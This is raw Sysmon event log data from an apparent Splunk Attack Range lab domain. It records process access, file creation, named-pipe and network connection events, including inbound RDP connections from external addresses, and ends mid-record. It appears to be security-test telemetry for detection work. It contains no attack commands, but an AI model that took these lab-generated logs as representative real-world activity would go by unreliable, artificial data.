07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001048848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.592{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51019-false10.0.1.12-8000- 23542300x80000000000000001048847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:00.964{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1BB4D1CFED1C79971863A47CAE382A5,SHA256=B767B2176D64A31138B7C9DAC79BE3F7DF474B22CE76F00B7E7DDB12433E74D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:00.227{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=928FAA5DB8BF00BD01F97EB80A00D2BE,SHA256=752ED4C212EDFEC16417BCD06542701C93282B9A371EFDDF3BD73E5C79056F4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807506Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:00.276{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35FFAADF690BB5A8E14EE619CBC86848,SHA256=2A5AD51FDC30CFA135E1BEF85D718C5C004DE165D93056CF2BBFC2ABDC1D061A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807505Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:58.190{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57260-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001048849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:01.295{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807507Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:01.291{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6E65E02E0383055A6B949F2C3C527DB,SHA256=29B71461EF8F37BC35A17A20EA6A678C498998B8630F46CA8E24A731704D8DB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807508Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:02.338{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80AB6207E77D9F6A286B8B481E0C64A1,SHA256=BF6B49D9DD87E63FDFD073E595E171FE7C9B7F501C8EB2E0F35108F7F9D8B738,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:02.745{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5908B71AD457D4F41DA91769D0ECAB10,SHA256=A1DC0C1BE426B632ADA234FBF36D4ED891A9E38229F8A8FD1819BC7AD443CAD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:02.744{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19E3D1AAB6DD505E4B92B0DD074F7CB3,SHA256=C0F9937BEE3F0AC1C9A0C6FF11182BB72F76B8F0AD79D2AAB28B5FAFC4ED1330,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:01.996{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0ED915773161E93C9EB5B0E4CB111B,SHA256=AF9AE896BDF50859FBC116BB3C50EC172BCD0F20EB78A84E4D3C5794B8759621,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807509Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:03.401{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5538BA4B9D3E26473687D62399581C6B,SHA256=F2D2B24BF513A972D9D626B152A713D32DD853ADCAFBCDE06669885A2598BA43,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.948{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse95.53.247.168shpd-95-53-247-168.vologda.ru30539-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001048853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:03.027{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC57364381D7D6645E51AB0ECA198032,SHA256=59C9F2A789978ABD81653EE9E4591EFF80F4F2BDEADAB9765E972EFC74AB2DF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807510Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:04.448{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D45D0F19CB6FDEE17E53D041EFAD1225,SHA256=ACD82E09DAA351BC9CD871ED6F5554829A1F5992DBA6252EB1320EE141FEB32A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:04.045{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96F36BA88F36012B01B856C290EAEB48,SHA256=07B7916B363860E97319B85E0B66D2B7673AD62E9487A96A1F9AF1C4C4DD9B7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807514Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:05.760{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68D0C7FC4FD54187DF19867D72E4513D,SHA256=EC9AC3541D8BAE625A20C0283C0754D36A9D9EA49D1A3C0F854E9D90269A9F6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807513Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:05.760{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB21AA7180C8B43A23A992F47DB272BD,SHA256=71DBCCA8263575F075B94D1D36D5A01E31DDBC4F02143A9FD7801B9A77B86170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807512Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:05.463{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=789EECC8A8F6DE0F30C2FFB834158417,SHA256=B3DD2D13604E5A8B120758D4D137B2721232BB4921F9ED99E6EE0E19F0B80FA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:05.062{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B5A7B4DF3D39364D271E1D2C3CEE3B1,SHA256=018F48E1810EF28F2E11EFA0104F56C22E041EEFAC8A000F4DC63ADC3BF8DBDF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807511Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:04.189{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57261-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807517Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:06.463{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DBC38B7FBC9DAF3ED7E912ACC9AADC8,SHA256=F735D8255CB3E73A1CC883480FF8F4F67521937213BD22264AA4C5527C8D8AD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:06.247{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:06.193{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001048862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:06.193{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001048861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:52:06.193{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.3924.431.153330220C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001048860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:52:06.193{466BC892-53D9-60E8-E60F-00000000CF01}3924\chrome.3924.431.153330220C:\Program Files\Mozilla Firefox\firefox.exe 354300x80000000000000001048859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:58.312{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57262-false10.0.1.14win-dc-890.attackrange.local49676- 354300x80000000000000001048858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:57.723{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51020-false10.0.1.12-8000- 23542300x80000000000000001048857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:06.078{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10135BE9AFB9115BEFF0C3887DB7702C,SHA256=4EA6A61815090C2179E83F1AD9312C9C97A060768E13117476E740F56AA9EBD9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807516Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:04.917{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57262-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x8000000000000000807515Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:04.620{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-41968-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000807518Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:07.510{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EBD8D8EEB04EB3B1D2782F3B234EFBA,SHA256=1E3805D38249A3F8600EFBC7A1542458307ED57D148F99F0D676DC8D8A65B7ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:07.078{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C2C762FD80B7CF0E7273D7FAE7D6D14,SHA256=FD5C3BD56BF6C8E2F814B57B587697E9EA3B0F40FAE226636A2E51557BEF536C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807519Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:08.510{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A11A18180A912C91FDEE8F15607C0BC,SHA256=D3B0E76DC85365715CB36BE7EF02123C4E16BEF0873B495E5F101BD43A6E4A94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:08.111{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCA387B4E878887B9E13B61C4D2A9D8F,SHA256=26786B619E9043680D743CD71D69DB325200E9B4C071723FCBD33D19A74B0576,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807520Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:09.526{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34AE2EB54558492FA3233643D449F9EE,SHA256=B12C2B211BE3558C00A398717A265C52CF438C090BDFA78E50C7F165EA34EC38,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:09.984{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c46e|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x80000000000000001048874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 